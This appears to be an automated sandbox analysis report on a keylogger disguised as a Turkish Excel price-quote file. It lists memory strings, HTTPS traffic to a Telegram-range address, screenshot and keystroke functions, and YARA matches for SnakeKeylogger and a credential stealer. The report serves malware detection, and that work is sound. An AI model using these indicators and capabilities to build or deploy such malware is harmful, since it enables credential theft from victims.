                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.000000000307B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000031C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000031C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49828 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49871 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                    System Summary

                    barindex
                    Source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_031DD55C0_2_031DD55C
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DCA4900_2_07DCA490
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC00400_2_07DC0040
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC8ED00_2_07DC8ED0
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC69800_2_07DC6980
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC54B00_2_07DC54B0
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC34580_2_07DC3458
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC34480_2_07DC3448
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC00070_2_07DC0007
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC30200_2_07DC3020
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC2BE80_2_07DC2BE8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC4B000_2_07DC4B00
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133C1469_2_0133C146
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133D2839_2_0133D283
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133C4739_2_0133C473
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133C7389_2_0133C738
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_013369AB9_2_013369AB
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133E9889_2_0133E988
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133CA139_2_0133CA13
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01333AA19_2_01333AA1
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133CCDF9_2_0133CCDF
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133CFA99_2_0133CFA9
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01336FC89_2_01336FC8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01333E099_2_01333E09
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_013353779_2_01335377
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133F6319_2_0133F631
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133E97B9_2_0133E97B
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_013339EE9_2_013339EE
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_013329EC9_2_013329EC
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133FA889_2_0133FA88
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_0102D55C10_2_0102D55C
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_051E6A4810_2_051E6A48
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_051E000610_2_051E0006
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_051E004010_2_051E0040
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_051E6A3810_2_051E6A38
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B971810_2_071B9718
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B814810_2_071B8148
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B680010_2_071B6800
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B004010_2_071B0040
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B345810_2_071B3458
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B344810_2_071B3448
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B54B010_2_071B54B0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B4B0010_2_071B4B00
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B2BE810_2_071B2BE8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B813810_2_071B8138
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B000610_2_071B0006
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B302010_2_071B3020
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BC14614_2_012BC146
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BA08814_2_012BA088
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012B536214_2_012B5362
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BD27814_2_012BD278
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BC46814_2_012BC468
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BC73814_2_012BC738
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012B69A014_2_012B69A0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BE98814_2_012BE988
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BCA0814_2_012BCA08
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012B3AA114_2_012B3AA1
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BCCD814_2_012BCCD8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BCFA914_2_012BCFA9
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012B6FC814_2_012B6FC8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BF63114_2_012BF631
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BE97B14_2_012BE97B
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012B39EE14_2_012B39EE
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012B29EC14_2_012B29EC
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012BFA8814_2_012BFA88
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_012B3E0914_2_012B3E09
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059261E814_2_059261E8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05922D9A14_2_05922D9A
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05924D9814_2_05924D98
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05924D8914_2_05924D89
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05922DA814_2_05922DA8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05920DF014_2_05920DF0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05920DE014_2_05920DE0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592750814_2_05927508
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592EC9014_2_0592EC90
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592D49714_2_0592D497
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592EC8114_2_0592EC81
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592248814_2_05922488
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592BCB214_2_0592BCB2
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592D4A814_2_0592D4A8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059204D014_2_059204D0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592A4D814_2_0592A4D8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592BCC014_2_0592BCC0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059204C014_2_059204C0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592A4C814_2_0592A4C8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05928CF014_2_05928CF0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059274F814_2_059274F8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05928CE114_2_05928CE1
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592247714_2_05922477
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592447814_2_05924478
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592446714_2_05924467
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592E7BA14_2_0592E7BA
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592CFD014_2_0592CFD0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05923FD814_2_05923FD8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592E7C814_2_0592E7C8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05921FF814_2_05921FF8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592B7F814_2_0592B7F8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05929FFF14_2_05929FFF
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592CFE014_2_0592CFE0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05923FE814_2_05923FE8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05921FE814_2_05921FE8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592B7E814_2_0592B7E8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592171014_2_05921710
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592170114_2_05921701
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05927E9814_2_05927E98
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592968014_2_05929680
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05927E8814_2_05927E88
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059266B014_2_059266B0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059256B814_2_059256B8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059236B914_2_059236B9
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059266A014_2_059266A0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059256A914_2_059256A9
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059236C814_2_059236C8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592F61014_2_0592F610
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592DE3814_2_0592DE38
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592F62014_2_0592F620
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592DE2814_2_0592DE28
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592C65014_2_0592C650
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592AE5814_2_0592AE58
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592C64114_2_0592C641
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592AE6814_2_0592AE68
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592966F14_2_0592966F
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592C18814_2_0592C188
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592A98F14_2_0592A98F
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059291B814_2_059291B8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592A9A014_2_0592A9A0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059291A714_2_059291A7
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059279D014_2_059279D0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059261D914_2_059261D9
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059279C014_2_059279C0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592291814_2_05922918
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592290A14_2_0592290A
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592490814_2_05924908
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592095014_2_05920950
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592F15814_2_0592F158
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592F14714_2_0592F147
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592D97014_2_0592D970
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592C17814_2_0592C178
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592096014_2_05920960
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592D96014_2_0592D960
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_059248F914_2_059248F9
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592A01014_2_0592A010
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592881914_2_05928819
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592000614_2_05920006
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592882814_2_05928828
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592702F14_2_0592702F
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592004014_2_05920040
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592704014_2_05927040
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592CB1614_2_0592CB16
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592CB1814_2_0592CB18
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592B31F14_2_0592B31F
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592E30014_2_0592E300
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592B33014_2_0592B330
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05925B3714_2_05925B37
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05929B3814_2_05929B38
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592835014_2_05928350
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05923B5814_2_05923B58
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05921B5814_2_05921B58
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05925B4814_2_05925B48
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05929B4814_2_05929B48
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05923B4814_2_05923B48
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05926B7814_2_05926B78
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592836014_2_05928360
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05926B6A14_2_05926B6A
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_05921B6814_2_05921B68
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592128014_2_05921280
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592FAD714_2_0592FAD7
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592FAE814_2_0592FAE8
